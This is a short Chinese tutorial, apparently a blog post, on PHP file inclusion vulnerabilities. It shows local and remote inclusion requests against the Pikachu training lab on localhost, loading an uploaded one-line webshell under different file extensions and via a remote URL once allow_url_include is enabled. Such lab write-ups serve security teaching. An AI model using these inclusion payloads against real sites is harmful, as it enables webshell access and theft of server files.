文件包含漏洞

概述:

文件包含有本地文件包含(loacl) 和 **远程文件包含(remote)**两种

**本地文件包含:**文件上传本地后通过文件包含漏洞直接解析

**远程文件包含:**远程请求服务(公网)

**概括:**文件包含漏洞其实就是开发语言内置了文件包含函数,有的文件包含的代码被设置成了通过前端传入的变量,在网站没有做充分的安全校验下,攻击者可以读取服务器敏感文件、在日志写入getshell通过文件包含访问,配合文件上传等(访问即被解析)

现在用pikachu演示(PHP5.5)

本地文件包含:

用1.txt表示我已经上传的木马,现在用文件包含访问解析:

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.txt&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

将1.txt后缀改为1.png

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.png&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

后缀改为php

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=1.php&submit=提交查询

远程文件包含:

首先将php.ini的allow_url_include改为ON

在phpstuduy(模拟远程)放一个一句话木马然后通过远程文件包含访问

上传我写的一句话木马,访问:

复制代码
http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu-master/info.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
相关推荐
点心的游戏开发世界13 小时前
GDScript 入门笔记(十二):类型系统进阶
笔记·游戏引擎·godot
嘟哩DuliDuli13 小时前
AI 视频局部重做,怎么避免破坏成片
人工智能·安全·ai·音视频·软件工程
weixin_6182323013 小时前
OpenAI智能体“劫持”德国老网站当留言板
人工智能·安全
Neighbor_OldY14 小时前
【实战复盘】XSS跨站脚本攻击检测与应急处置:存储型/反射型/DOM型从发现到修复的完整指南
网络·安全·web安全
LuminousCPP14 小时前
数据结构-排序(一):基础排序算法横向对比|冒泡、插入、希尔、堆与双向选择,详解二分 / Knuth 增量
c语言·数据结构·笔记·算法·排序算法
柳鲲鹏14 小时前
股票打新,中签为什么难?
笔记
亮工硬件14 小时前
1-8 简易串口通讯协议(UART + 自定义帧协议)
笔记·stm32·单片机·嵌入式硬件·学习
志尊宝15 小时前
Vue3 零基础每日笔记(004):模板语法初识——插值表达式、v-bind、v-on 一次学会
javascript·vue.js·笔记
南京码讯光电技术有限公司15 小时前
工业防爆AP vs 普通工业AP:安全差距与合规红线
安全